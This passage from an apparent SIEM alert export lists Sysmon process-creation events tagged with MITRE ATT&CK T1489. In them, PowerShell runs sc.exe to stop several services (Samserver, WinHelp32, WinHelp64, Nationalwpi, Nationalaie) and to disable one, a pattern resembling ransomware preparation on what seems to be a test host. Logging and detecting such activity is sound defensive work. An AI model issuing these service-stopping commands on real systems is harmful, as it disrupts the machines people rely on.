Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:02.698",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:34.395 +ProcessGuid: {df9fc3d3-b35e-5ecf-0000-0010a64f1900} +ProcessId: 968 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop Samserver +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: 
MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop Samserver",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:34.396931100Z"",""eventRecordID"":""2084"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:34.395\r\nProcessGuid: {df9fc3d3-b35e-5ecf-0000-0010a64f1900}\r\nProcessId: 968\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop Samserver\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: 
C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:49:34.395"",""processGuid"":""{df9fc3d3-b35e-5ecf-0000-0010a64f1900}"",""processId"":""968"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop Samserver"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:02.651",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:34.356 +ProcessGuid: {df9fc3d3-b35e-5ecf-0000-0010494d1900} +ProcessId: 1160 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop WinHelp64 +CurrentDirectory: 
C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop WinHelp64",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:34.358937700Z"",""eventRecordID"":""2081"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:34.356\r\nProcessGuid: {df9fc3d3-b35e-5ecf-0000-0010494d1900}\r\nProcessId: 1160\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop WinHelp64\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: 
MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:49:34.356"",""processGuid"":""{df9fc3d3-b35e-5ecf-0000-0010494d1900}"",""processId"":""1160"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop WinHelp64"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:02.603",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:34.317 +ProcessGuid: {df9fc3d3-b35e-5ecf-0000-0010eb4a1900} +ProcessId: 3780 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 
(WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop WinHelp32 +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop WinHelp32",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:34.318925700Z"",""eventRecordID"":""2078"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:34.317\r\nProcessGuid: {df9fc3d3-b35e-5ecf-0000-0010eb4a1900}\r\nProcessId: 3780\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop WinHelp32\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: 
DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:49:34.317"",""processGuid"":""{df9fc3d3-b35e-5ecf-0000-0010eb4a1900}"",""processId"":""3780"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop WinHelp32"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:02.588",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: 
+RuleName: +UtcTime: 2020-05-28 12:49:34.306 +ProcessGuid: {df9fc3d3-b35e-5ecf-0000-0010224a1900} +ProcessId: 3268 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Config WinHelp32 Start= Disabled +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Config WinHelp32 Start= Disabled",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:34.308360300Z"",""eventRecordID"":""2077"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:34.306\r\nProcessGuid: {df9fc3d3-b35e-5ecf-0000-0010224a1900}\r\nProcessId: 3268\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating 
System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Config WinHelp32 Start= Disabled\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:49:34.306"",""processGuid"":""{df9fc3d3-b35e-5ecf-0000-0010224a1900}"",""processId"":""3268"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Config WinHelp32 Start= Disabled"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John 
Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:02.540",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:34.284 +ProcessGuid: {df9fc3d3-b35e-5ecf-0000-001090481900} +ProcessId: 3252 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop Nationalwpi +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop 
Nationalwpi",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:34.286567800Z"",""eventRecordID"":""2075"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:34.284\r\nProcessGuid: {df9fc3d3-b35e-5ecf-0000-001090481900}\r\nProcessId: 3252\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop Nationalwpi\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:49:34.284"",""processGuid"":""{df9fc3d3-b35e-5ecf-0000-001090481900}"",""processId"":""3252"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration 
Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop Nationalwpi"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:02.494",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:34.250 +ProcessGuid: {df9fc3d3-b35e-5ecf-0000-0010f7451900} +ProcessId: 7120 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop Nationalaie +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: 
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop Nationalaie",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:34.252163100Z"",""eventRecordID"":""2072"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:34.250\r\nProcessGuid: {df9fc3d3-b35e-5ecf-0000-0010f7451900}\r\nProcessId: 7120\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop Nationalaie\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 
12:49:34.250"",""processGuid"":""{df9fc3d3-b35e-5ecf-0000-0010f7451900}"",""processId"":""7120"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop Nationalaie"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:02.462",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:34.220 +ProcessGuid: {df9fc3d3-b35e-5ecf-0000-001067441900} +ProcessId: 5940 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager 